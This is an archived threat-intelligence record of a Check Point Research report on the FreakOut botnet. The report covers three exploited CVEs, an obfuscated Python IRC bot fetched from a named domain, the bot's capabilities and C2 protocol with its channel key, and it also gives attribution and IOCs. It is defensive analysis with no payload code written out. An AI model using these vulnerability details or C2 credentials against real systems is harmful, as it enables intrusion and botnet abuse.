{
	"id": "4c3b8e75-54f2-43ce-b4af-a39dc3660b5e",
	"created_at": "2026-04-06T00:18:16.116899Z",
	"updated_at": "2026-04-10T13:11:45.563909Z",
	"deleted_at": null,
	"sha1_hash": "b7107413b20ff79f3c29635438257ec64bde7518",
	"title": "FreakOut – Leveraging Newest Vulnerabilities for creating a Botnet - Check Point Research",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 99299,
	"plain_text": "FreakOut – Leveraging Newest Vulnerabilities for creating a Botnet -\r\nCheck Point Research\r\nBy Ori Hamama\r\nPublished: 2021-01-19 · Archived: 2026-04-05 17:13:21 UTC\r\nResearch By: Omer Ventura, Ori Hamama, Network Research\r\nIntroduction\r\nRecently, Check Point Research encountered several attacks that exploited multiple vulnerabilities, including some that were\r\nonly recently published, to inject OS commands. The goal behind the attacks was to create an IRC botnet, which can later be\r\nused for several purposes, such as DDoS attacks or crypto-mining.\r\nThe attacks aim at devices that run one of the following:\r\nTerraMaster TOS(TerraMaster Operating System) – the operating system used for managing TerraMaster NAS\r\n(Network Attached Storage) servers\r\nZend Framework –  a collection of packages used in building web application and services using PHP, with more\r\nthan 570 million installations\r\nLiferay Portal – a free, open-source enterprise portal. It is a web application platform written in Java that offers\r\nfeatures relevant for the development of portals and websites\r\nFigure1\r\nFigure 1: The products attacked by the campaign.\r\nEach of the infected devices can be later used as an attacking platform, thus making the attack flow recursive. In a later\r\nvariant, Xmrig causes the victim’s device to engage in coin-mining.\r\nFreakOut Infection Chain\r\nThe attack flow of the campaign\r\nFigure 2: The attack flow of the campaign.\r\nThe campaign exploits these recent vulnerabilities: CVE-2020-28188, CVE-2021-3007 and CVE-2020-7961. These allow\r\nthe attacker to upload and execute a Python script on the compromised servers.\r\nCVE-2020-28188\r\nThe vulnerability is caused by a lack of input validation in the “event” parameter in the “makecvs” PHP page\r\n(/include/makecvs.php). This allows a remote unauthenticated attacker to inject OS commands, and gain control of the\r\nservers using TerraMaster TOS (versions prior to  4.2.06).\r\nThe attack exploiting CVE-2020-28188 as seen in the logs.\r\nFigure 3: The attack exploiting CVE-2020-28188 as seen in our sensors.\r\nCVE-2021-3007\r\nThis vulnerability is caused by the unsecured deserialization of an object. In versions higher than Zend Framework 3.0.0, the\r\nattacker abuses the Zend3 feature that loads classes from objects in order to upload and execute malicious code in the server.\r\nThe code can be uploaded using the “callback” parameter, which in this case inserts a malicious code instead of the\r\n“callbackOptions” array.\r\nThe attack exploiting CVE-2021-3007 as seen in\r\nthe logs.\r\nFigure 4: The attack exploiting CVE-2021-3007 as seen in our sesnors.\r\nCVE-2020-7961\r\nhttps://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/\r\nPage 1 of 9\n\nThe vulnerability is a Java unmarshalling vulnerability via JSONWS in Liferay Portal (in versions prior to 7.2.1 CE GA2).\r\nMarshalling, which is similar to serialization, is used for communication with remote objects, in our case with a serialized\r\nobject. Exploiting the vulnerability lets the attacker provide a malicious object, that when unmarshalled, allows remote code\r\nexecution.\r\nFigure 5: The attack exploiting CVE-2020-7961 as seen in our sensors.\r\nIn all the attacks involving these CVEs, the attacker’s first move is to try running different syntaxes of OS commands to\r\ndownload and execute a Python script named “out.py”.\r\nAfter the script is downloaded and given permissions (using the “chmod” command), the attacker tries to run it using Python\r\n2. Python 2 reached EOL (end-of-life) last year, meaning the attacker assumes the victim’s device has this deprecated\r\nproduct installed.\r\nThe Python Code – out.py\r\nThe malware, downloaded from the site http://gxbrowser[.]net, is an obfuscated Python script consisting of polymorphic\r\ncode. Many of the function names remain the same in each download, but there are multiple functions that are obfuscated\r\nusing random strings generated by a packing function. The first attack trying to download the file was observed on January\r\n8, 2021. Since then, hundreds of download requests from the relevant URL were made.\r\nThe __init__ function of the main class of the\r\ncode “out.py”. The code is obfuscated and encoded\r\nwith several different functions. Each time it is\r\ndownloaded, the code is obfuscated anew. differently.\r\nFigure 6: The __init__ function of the main class of the code “out.py”. The code is obfuscated and encoded with several\r\ndifferent functions. Each time it is downloaded, the code is obfuscated anew. differently.\r\nWhen we searched for the relevant domain and file in VirusTotal (VT), we found other codes called “out.py”.\r\nThese files were uploaded only a few hours before the attacks began, and had low scores of detections by the AVs presented\r\nin VirusTotal. All the files originated from the same domain, hxxp://gxbrowser[.]net, as this address is hardcoded in all\r\nscripts and is the only address that appears.\r\nOther codes related to the domain and IP. Both are\r\nPython-based although the second is classified as\r\nJava.\r\nFigure 7: Other codes related to the domain and IP. Both are Python-based although the second is classified as Java.\r\nWhen we examined the first variation uploaded to VT (the third one in Fig.7) with our script, and compared the codes and\r\ntheir functions, it seemed to be a slightly earlier version of the code.\r\nComparing the different files. They have some\r\nsimilarities in function names and comments that\r\nshed some light on the more obfuscated code.\r\nhttps://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/\r\nPage 2 of 9\n\nFigure 8: Comparing the different files. They have some similarities in function names and comments that shed some light\r\non the more obfuscated code.\r\nThe code itself is less obfuscated, includes comments, and seems to be related to our attacker.\r\nFigure 9: An earlier version of the same function\r\npresented in Fig.3. This time it contained developer\r\ncomments revealing some of the variables’ purposes.\r\nFigure 9: An earlier version of the same function presented in Fig.6. This time it contained developer comments revealing\r\nsome of the variables’ purposes.\r\nIn addition, in this version, the attacker left a calling card with relevant information, including the code developer’s name\r\nand an update that took place on January 1, 2021. All this information was omitted in the version we studied\r\nA calling card left in the earlier version of the\r\ncode\r\nFigure 10: A calling card left in the earlier version of the code.\r\nComparing the two codes and the different comments helped reveal the code communication methods, the capabilities and\r\nthe threat actor behind it.\r\nThe Malware Capabilities\r\nAt this point, the facilities and capabilities of the malware became clearer.\r\nThere is a specific function for each of the main capabilities, making the code very modular and easy to change or maintain:\r\nPort Scanning utility\r\nCollecting system fingerprint\r\nIncludes the device address (MAC, IP), and memory information. These are used in different functions of the\r\ncode for different checks\r\nTerraMaster TOS version of the system\r\nCreating and sending packets\r\nARP poisoning for Man-in-the-Middle attacks.\r\nSupports UDP and TCP packets, but also application layer protocols such as HTTP, DNS, SSDP, and SNMP\r\nProtocol packing support created by the attacker.\r\nBrute Force – using hard coded credentials \r\nWith this list, the malware tries connecting to other network devices using Telnet. The function receives an IP\r\nrange and tries to brute force each IP with the given credential. If it succeeds, the results of the correct\r\ncredential are saved to a file, and sent in a message to the C2 server\r\nHandling sockets\r\nIncludes handling exceptions of runtime errors.\r\nSupports multi-threaded communication to other devices. This allows simultaneous actions the bots can\r\nperform while listening to the server\r\nSniffing the network\r\nExecutes using the “ARP poisoning” capability. The bot sets itself as a Man-in-the-Middle to other devices.\r\nThe intercepted data is sent to the C2 server\r\nSpreading to different devices, using the “exploit” function.\r\nRandomly generates the IPs to attack\r\nExploits the CVEs mentioned above (CVE-2020-7961 , CVE-2020-28188, CVE-2021-3007)\r\nGaining persistence by adding itself to the rc.local configuration.\r\nDDOS and Flooding – HTTP, DNS, SYN\r\nSelf-implementation of Slowlaris. The malware creates many sockets to a relevant victim address for the\r\npurpose of instigating a DDoS attack\r\nOpening a reverse-shell – shell on the client\r\nKilling a process by name or ID\r\nhttps://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/\r\nPage 3 of 9\n\nPacking and unpacking the code using obfuscation techniques to provide random names to the different functions and\r\nvariables\r\nPart of the function exploit, which is responsible\r\nfor the spreading attempts. Exploits CVE-2020-7961,\r\nCVE-2020-28188 and CVE-2021-3007, after\r\nclarification.\r\nFigure 11: Part of the function exploit, which is responsible for the spreading attempts. Exploits CVE-2020-7961, CVE-2020-28188 and CVE-2021-3007, after clarification.\r\nThe Malware’s Communication\r\nEach infected device is configured to communicate with a hardcoded C2 server. All the connection credentials are\r\nobfuscated and encoded in the code itself multiple times, and are generated using multiple functions.\r\nAt the initial connection to the server, the conversation begins with the client sending a “NICK message”, which declares the\r\nuser nickname. The nickname is generated with this format:\r\n[HAX|System OS|Machine Type|CPU count] 8-12 random letters\r\nAn example of the bot nickname as created by the script:\r\n[HAX|Linux|x86_64|3] QCRjbbnQm\r\nAfter declaring the nickname of the client, the client sends the username, which is the nickname plus the IRC address and\r\nthe string “localhost  :”, followed by the bot nickname. When the server accepts this message, the communication begins.\r\nFollowing a quick back and forth set of Ping-Pong messages, the server provides the client server information about the\r\nchannels. Then, one minute later, the client can join channels on the server.\r\nIn FreakOut, the relevant channel was “#update” on the server “gxbrowser[.]net”.  The user must provide a channel key,\r\nused as a password, to connect to the channel. The key can be extracted from the code, and is equal to the string\r\n“N3Wm3W”.\r\nCommunication with the server. Initiates the\r\nconversation with the relevant messages.\r\nFigure 12: Communication with the server. Initiates the conversation with the relevant messages.\r\nThe client can now be used as a part of a botnet campaign and accepts command messages from the server to execute. The\r\ncommands are sent using a symbols-based communication. Each message sent by the server is parsed and split into different\r\nsymbols, with each one having a different meaning.\r\nEvery message includes the command name (i.e: udpflood, synflood) and the rest of the arguments change accordingly.\r\nWhen the client finishes executing the relevant command as received from C2, it then sends the results in a private message\r\n(PRIVMSG IRC command) to the relevant admin in the channel, providing it with relevant details.\r\nCommunication with the server. The server\r\naccepts commands in the format mentioned above.\r\nFigure 13: Communication with the server. The server accepts commands in the format mentioned above.\r\nThe Impact\r\nBased on the malware features, it seems that the attacker can use the compromised systems for further attacks, such as using\r\nthe system resources for crypto-mining, spreading laterally across the company network, or launching attacks on outside\r\ntargets while masquerading as the compromised company. We revealed further information about FreakOut when we used\r\nhttps://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/\r\nPage 4 of 9\n\nthe algorithm-created credentials to connect to the server. After logging in, additional server information is provided to the\r\nclient, including the room’s capacity, the users connected and even operators and unknown connections.\r\nAfter logging in, more information is provided\r\nabout the server.\r\nFigure 14: After logging in, more information is provided about the server.\r\nThe server was created in late November 2020 and has been running ever since with 300 current users and 5 channels.\r\nExploring the different channels revealed a very active one, called #update. This channel includes 186 exploited devices\r\ncommunicating with the server, as seen in the messages exchanged between the IRC server and the client, and in the channel\r\npage:\r\nFigure 15: The #update channel, as seen in the IRC communication with the malware and in the IRC channel surfed through\r\na web interface.\r\nWe observed two additional channels called “opers” (which probably stands for operators as we have seen the server admin\r\nthere), and “andpwnz”. The network name of the server is called “Keknet”. Due to the fact the file was updated and released\r\nin January 2021, we believe this scale was reached in less than a week. Therefore, we can assume that this campaign will\r\nratchet up to higher levels in the near future.\r\nThreat Actors\r\nTo identify the threat actors responsible for the attacks, we searched for leads in the internet and social media.  Searching for\r\nboth the code author, who goes by the name “Freak” (which we have also seen in the IRC server channels) and the IRC bot\r\nname “N3Cr0m0rPh”, revealed information about the threat actor behind the campaign.\r\nhttps://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/\r\nPage 5 of 9\n\nIn a post published on HackForums back in 2015, submitted by the user “Fl0urite” with the title “N3Cr0m0rPh Polymorphic\r\nIRC BOT”, the bot is offered for sale in exchange for BitCoins (BTC). This bot seem to have many of the same capabilities\r\nas the current one, and the same description as the current bot in the calling card. However, some of the features were\r\nomitted over the years, such as the USB worm and the regedit ability.\r\nThe post submitted by “Fl0urite” back in 2015.\r\nThe name of the IRC bot is the same, with many\r\nsimilar capabilities.\r\nFigure 16: The post submitted by “Fl0urite” back in 2015. The name of the IRC bot is the same, with many similar\r\ncapabilities.\r\nThe name “Fl0urite” is mentioned in other hacking forums and GitHub, and is associated with multiple pieces of code which\r\ncan be found on these sites that resemble the current malware code functions.\r\nAs mentioned previously, “Freak@PopulusControl” appears to be the author of  the latest code version. When we searched\r\nfor these strings, we found several results, including an earlier version of the malware code (V6). In this version, however,\r\nthe author left a comment, explaining the code is a free tool and that redistribution is allowed.\r\nV6\r\nFigure 17: Version 6 of the code.\r\nAs mentioned previously,  the admin in the IRC channel is also called “Freak.”\r\nThe user “Freak” joins and leaves the #update\r\nchannel on the server.\r\nFigure 18: The user “Freak” joins and leaves the #update channel on the server.\r\nIn early 2015 codes found on Pastebin , that were uploaded by the user “Keksec”, there seems to be a link between the two\r\nidentities “Fl0urite” and “Freak” in several files. In addition, there is a link to the user “Fl0urite” on HackForums in these\r\nfiles signed by “Freak.” The other files uploaded by the user are signed with the exact string “Freak@PopulusControl (aka\r\nsudoer)” that seems to be associated with the malware functions as well. Based on this evidence, we conclude that both\r\nidentities belong to the same person.\r\nIn the Pastebin, there are also files that were uploaded recently (January 12, 2021).\r\nFiles uploaded to Pastebin. The author presents\r\nhimself as Freak/Fl0urite. The address is related to\r\nthe user “Fl0urite” in HackForums, while later files\r\nuploaded are signed only with\r\n“Freak@PopulousControl.”\r\nFigure 19-20: Files uploaded to Pastebin. The author presents himself as Freak/Fl0urite. The address is related to the user\r\n“Fl0urite” in Hack Forums, while later files uploaded are signed only with “Freak@PopulousControl.”\r\nThe URL of the site gxbrowser[.]net reveals the following page:\r\nhttps://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/\r\nPage 6 of 9\n\nThe index page of gxbrowser[.]net\r\nFigure 21: The index page of gxbrowser[.]net\r\nThe page has the names “keksec” and “Freak” which were observed in the Pastebin files, and is also associated with the\r\nname “Keknet” seen in the IRC server.\r\nCurrently, it seems that “Freak” is using it to create a botnet.\r\nOn VT, and on the relevant Pastebin mentioned previously, there are other files related to the domain such as Crypto-mining\r\nmalwares. In the latest code downloaded (January 12, 2021), it seems that the malware tries to exploit the vulnerabilities to\r\ninstall the Xmrig from the server hxxp://gxbrowser[.]net.\r\nExploit function in the newest edition of the script\r\n– clarified. The file “xmrig1” is also downloaded.\r\nFigure 22: The file xmrig1 on the server gxbrowser[.]net\r\nExploit function in the newest edition of the script\r\n– clarified. The file “xmrig1” is also downloaded.\r\nFigure 23: Exploit function in the newest edition of the script – clarified. The file “xmrig1” is also downloaded.\r\nConclusion\r\nFreakOut is an attack campaign that utilizes three vulnerabilities, including some newly released, to compromise different\r\nservers. The threat actor behind the attack, named “Freak”, managed to infect many devices in a short period of time, and\r\nincorporated them into a botnet, which in turn is used for DDoS attacks and crypto-mining. Such attack campaigns highlight\r\nthe importance of taking sufficient precautions and updating your security protections on a regular basis. As we have\r\nobserved, this is an ongoing campaign that can spread rapidly.\r\nMITRE ATT\u0026CK TECHNIQUES\r\nInitial\r\nAccess\r\nResource\r\nDevelopment\r\nExecution Persistence\r\nPrivilege\r\nEscalation\r\nDefense Evasion\r\nCredential\r\nAccess\r\nDiscovery\r\nLateral\r\nMovement\r\nExploit\r\nPublic-Facing\r\nApplication\r\n(T1190)\r\nAcquire\r\ninfrastructure:\r\nDomains\r\n(T1583/003)\r\nExploitation\r\nfor Client\r\nExecution\r\n(T1203)\r\nEvent\r\nTriggered\r\nExecution:\r\n.bash_profile\r\nand .bashrc\r\n(T1546/004)\r\nEvent\r\nTriggered\r\nExecution:\r\n.bash_profile\r\nand .bashrc\r\n(T1546/004)\r\nDeobfuscate/Decode\r\nFiles or Information\r\n(T1140)\r\nBrute Force\r\n(T1110)\r\nNetwork\r\nService\r\nScanning\r\n(T1046)\r\nRemote\r\nServices\r\n(T1021)\r\nhttps://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/\r\nPage 7 of 9\n\nCompromise\r\nInfrastructure:\r\nBotnet\r\n(T1584/005)\r\nCommand\r\nand\r\nScripting\r\nInterpreter\r\n(T1059)\r\nFile and Directory\r\nPermissions\r\nModification: Linux\r\nand Mac File and\r\nDirectory\r\nPermissions\r\nModification\r\n(T1222/002)\r\nMan-in-the-Middle:\r\nARP Cache\r\nPoisoning\r\n(T1557/002)\r\nExploitation\r\nof Remote\r\nServices\r\n(T1210)\r\nCommand\r\nand\r\nScripting\r\nInterpreter:\r\nPython\r\n(T1059/006)\r\nCommand\r\nand\r\nScripting\r\nInterpreter:\r\nUnix Shell\r\n(T1059/004)\r\nProtections\r\nCheck Point customers are protected by these protections:\r\nIPS\r\nTerraMaster TOS Command Injection (CVE-2020-28188).\r\nLiferay Portal Insecure Deserialization (CVE-2020-7961).\r\nZend Framework Remote Code Execution (CVE-2021-3007).\r\nCMD Injection Over HTTP\r\nAnti-Bot\r\nWin32.IRC.G\r\nN3Cr0m0rPh.TC.a\r\nWin32.N3Cr0m0rPh.TC.a\r\nWin32.N3Cr0m0rPh.TC.b\r\nWin32.N3Cr0m0rPh.TC.c\r\nWin32.N3Cr0m0rPh.TC.d\r\nIOCs\r\nhxxp://gxbrowser[.]net\r\n7c7273d0ac2aaba3116c3021530c1c868dc848b6fdd2aafa1deecac216131779 – out.py (less obfuscated)\r\n05908f2a1325c130e3a877a32dfdf1c9596d156d031d0eaa54473fe342206a65 – out.py (more obfuscated)\r\nac4f2e74a7b90b772afb920f10b789415355451c79b3ed359ccad1976c1857a8 – out.py (including the xmrig1\r\ninstallation)\r\nac6818140883e0f8bf5cef9b5f965861ff64cebfe181ff025e1f0aee9c72506cOut – xmrig1\r\nReferences\r\nhttps://kiwiirc.com/\r\nhttps://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/\r\nPage 8 of 9\n\nSource: https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/\r\nhttps://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/"
	],
	"report_names": [
		"freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet"
	],
	"threat_actors": [
		{
			"id": "5a270f6c-2c13-4abf-861e-7d44dcfa5ceb",
			"created_at": "2023-11-03T02:00:07.794425Z",
			"updated_at": "2026-04-10T02:00:03.383096Z",
			"deleted_at": null,
			"main_name": "Keksec",
			"aliases": [],
			"source_name": "MISPGALAXY:Keksec",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434696,
	"ts_updated_at": 1775826705,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b7107413b20ff79f3c29635438257ec64bde7518.pdf",
		"text": "https://archive.orkl.eu/b7107413b20ff79f3c29635438257ec64bde7518.txt",
		"img": "https://archive.orkl.eu/b7107413b20ff79f3c29635438257ec64bde7518.jpg"
	}
}